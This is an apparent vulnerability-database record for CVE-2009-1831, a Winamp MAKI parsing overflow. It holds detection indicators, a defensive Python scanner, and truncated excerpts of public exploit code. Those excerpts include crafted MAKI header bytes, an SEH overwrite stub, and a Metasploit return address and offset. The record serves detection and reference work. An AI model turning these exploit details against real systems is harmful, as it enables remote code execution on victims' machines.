CVE-2009-1831
Published: 2009-05-29
Priority: P258 · critical · CVSS 2.0 base score 9.3 (vector AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available (see the Exploit-DB and Metasploit entries below)
EPSS: 36.34% (98.3rd percentile)
The Nullsoft Modern Skins Support module (gen_ff.dll) in Nullsoft Winamp before 5.552 allows remote attackers to execute arbitrary code via a crafted MAKI file, which triggers an incorrect sign extension, an integer overflow, and a stack-based buffer overflow.
Affected (74 ranges indexed; only the range with version data is shown)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nullsoft | winamp | <= 5.55 | — |
Per the description above, the fix shipped in Winamp 5.552.
Detection & IOCs (extracted from sources)
Header bytes shared by the public exploit samples: 46 47 03 04 17 00 00 00 2A 00 00 00 71 49 65 51 87 0D 51 4A 91 E3 A6 B5 32 35 F3 E7
- Detect crafted MAKI files with the magic header bytes 46 47 03 04 placed in the Winamp Bento skin scripts directory as mcvcore.maki; this is the consistent delivery mechanism across all public exploits.
- The overflow trigger is a sequence of 0xFF bytes (11 bytes: FF FF FF FF FF FF FF FF FF FF FF) immediately following the MAKI header; monitor file writes containing this pattern in MAKI files.
- The exploit overwrites SEH (Structured Exception Handler) records on the stack; look for SEH chain corruption patterns (short JMP + NOP sled: EB 06 90 90) in stack memory during Winamp MAKI parsing.
- The Metasploit module targets winamp.exe 5.5.5.2405 with a return address of 0x12f02bc3 (pop/pop/ret gadget from in_mod.dll) at stack offset 16756; use this as a signature for exploit attempts against this specific version.
- The crafted MAKI file structure includes a type GUID 71 49 65 51 87 0D 51 4A 91 E3 A6 B5 32 35 F3 E7 in the header; this GUID is consistent across all exploit samples and can be used as a file-based detection signature.
- The exploit requires the victim to manually place mcvcore.maki into the Bento skin scripts directory, or be convinced to install a malicious skin; it is not a drive-by or network-reachable vector without user interaction.
- Winamp 5.552 and later are not vulnerable; the fix changed movsx (sign-extending) to movzx (zero-extending) for the string size field in gen_ff.dll, preventing the integer overflow.
- The Metasploit module's hardcoded RET address (0x12f02bc3 from in_mod.dll) is specific to Winamp 5.5.5.2405 on Windows XP SP3 / Windows 7 SP1; other versions or patch levels will require different offsets.
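As an added defender-side example (not part of this record or of any exploit it lists), the following Python script checks a MAKI file against the file-based indicators above: the 46 47 03 04 magic, the type GUID at bytes 12..27 of the header prefix, the 11-byte 0xFF run after that prefix, and the EB 06 90 90 stub. The 28-byte prefix length, the verdict rules and the sample blobs are assumptions constructed for this example.

```python
"""Heuristic scanner for the CVE-2009-1831 MAKI indicators listed in this record."""
import sys
from pathlib import Path

MAKI_MAGIC = bytes.fromhex("46470304")
HEADER_PREFIX_LEN = 28           # magic + two dwords + 16-byte type GUID, as quoted above
EXPLOIT_TYPE_GUID = bytes.fromhex("71496551870D514A91E3A6B53235F3E7")
FF_RUN = b"\xff" * 11            # overflow trigger: 11 consecutive 0xFF bytes
SEH_JMP_STUB = b"\xeb\x06\x90\x90"  # short JMP + NOP sled paired with the SEH overwrite


def scan_maki(data: bytes) -> dict:
    """Return which indicators a MAKI blob matches plus an overall verdict."""
    hits = {
        "maki_magic": data[:4] == MAKI_MAGIC,
        "exploit_type_guid": data[12:HEADER_PREFIX_LEN] == EXPLOIT_TYPE_GUID,
        # the trigger sits after the header, so only search past the fixed prefix
        "ff_run_after_header": FF_RUN in data[HEADER_PREFIX_LEN:],
        "seh_jmp_stub": SEH_JMP_STUB in data,
    }
    # The magic only says "this is a MAKI file"; require the trigger pattern to
    # call it crafted, and treat GUID / SEH stub alone as reasons for a closer look.
    if hits["maki_magic"] and hits["ff_run_after_header"]:
        hits["verdict"] = "crafted"
    elif hits["maki_magic"] and (hits["exploit_type_guid"] or hits["seh_jmp_stub"]):
        hits["verdict"] = "review"
    else:
        hits["verdict"] = "clean"
    return hits


def scan_file(path: str) -> dict:
    """Scan one file on disk, e.g. a skin's scripts/mcvcore.maki."""
    return scan_maki(Path(path).read_bytes())


# Constructed samples (not real skin scripts) so the scanner can run offline.
HEADER_PREFIX = bytes.fromhex("46470304170000002A000000") + EXPLOIT_TYPE_GUID
CLEAN_SAMPLE = MAKI_MAGIC + bytes(24) + bytes(range(32))
CRAFTED_SAMPLE = HEADER_PREFIX + FF_RUN + b"A" * 40 + SEH_JMP_STUB + b"B" * 8

if __name__ == "__main__":
    for target in sys.argv[1:]:
        print(target, scan_file(target)["verdict"])
    for name, blob in (("clean", CLEAN_SAMPLE), ("crafted", CRAFTED_SAMPLE)):
        print(name, scan_maki(blob))
```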
No detection rules found.
Exploit-DB · 2012-09-12 · Winamp - MAKI Buffer Overflow (Metasploit)
```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'Winamp MAKI Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw
exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file,
where memmove is used in an insecure way with user controlled data.
To exploit the vulnerability the attacker must convince the victim to install the
generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin,
or generate a new skin usi
```
Exploit-DB · 2009-05-26 · Winamp 5.551 - MAKI Parsing Integer Overflow
```c
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Vendor's web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3
And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i h
```
Exploit-DB · 2009-05-22 · Winamp 5.551 - MAKI Parsing Integer Overflow (PoC)
```c
/*
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
This is just a simple poc code to show how to
exploit the recent MAKI file parsing vulnerability.
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Vendor's web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Im not going into any real detail as this is just
a poc code and i think the guy who wrote the article
explains where and why the integer overflow happens.
Im sure if you are that interested have a look through
the dll your self and you will also see the vulnerable memmove :).
Credits to the guys down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
We are able to overwrite the exception handlers and
```
Exploit-DB · 2009-05-22 · Winamp 5.55 - MAKI script Universal Integer Overflow
```python
# Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit
# By: Encrypt3d.M!nd
#
# Based on: http://milw0rm.com/exploits/8767
#
# place "mcvcore.maki" on "\Winamp\Skins\Bento\scripts" and run winamp
#
# NOTE:i've tested this on version 5.51,if it isn't workin' with your version.
# just edit the calculations of the chars
#
header = (
"\x46\x47\x03\x04\x17\x00\x00\x00\x2A\x00\x00\x00"
"\x71\x49\x65\x51\x87\x0D\x51\x4A\x91\xE3\xA6\xB5"
"\x32\x35\xF3\xE7\x64\x0F\xF5\xD6\xFA\x93\xB7\x49"
"\x93\xF1\xBA\x66\xEF\xAE\x3E\x98\x7B\xC4\x0D\xE9"
"\x0D\x84\xE7\x4A\xB0\x2C\x04\x0B\xD2\x75\xF7\xFC"
"\xB5\x3A\x02\xB2\x4D\x43\xA1\x4B\xBE\xAE\x59\x63"
"\x75\x03\xF3\xC6\x78\x57\xC6\x87\x43\xE7\xFE\x49"
"\x85\xF9\x09\xCC\x53\x2A\xFD\x56\x65\x3
```
Exploit-DB · 2009-05-22 · Winamp 5.55 - MAKI Script Universal Overwrite (SEH)
```python
#usage: python winamp_maki_script.py
#Note : I got a problem while using this python file under windows,but it works great under ubuntu :p
print "**************************************************************************"
print " Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit\n"
print " Advisory : http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print " Serra7 Merra7,Koulchi Mderra7\n"
print "**************************************************************************"
import os
header1=(
"\x46\x47\x03\x04\x17\x00\x00\x00\x27\x00
```
Metasploit · Winamp MAKI Buffer Overflow
This module exploits a stack based buffer overflow in Winamp 5.55. The flaw exists in the gen_ff.dll and occurs while parsing a specially crafted MAKI file, where memmove is used in an insecure way with user controlled data. To exploit the vulnerability the attacker must convince the victim to install the generated mcvcore.maki file in the "scripts" directory of the default "Bento" skin, or generate a new skin using the crafted mcvcore.maki file. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
No writeups or analysis indexed.
References:
- http://vrt-sourcefire.blogspot.com/2009/05/winamp-maki-parsing-vulnerability.html
- http://www.securityfocus.com/bid/35052
- https://exchange.xforce.ibmcloud.com/vulnerabilities/50664
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A15683
- https://www.exploit-db.com/exploits/8767
- https://www.exploit-db.com/exploits/8770
- https://www.exploit-db.com/exploits/8772
- https://www.exploit-db.com/exploits/8783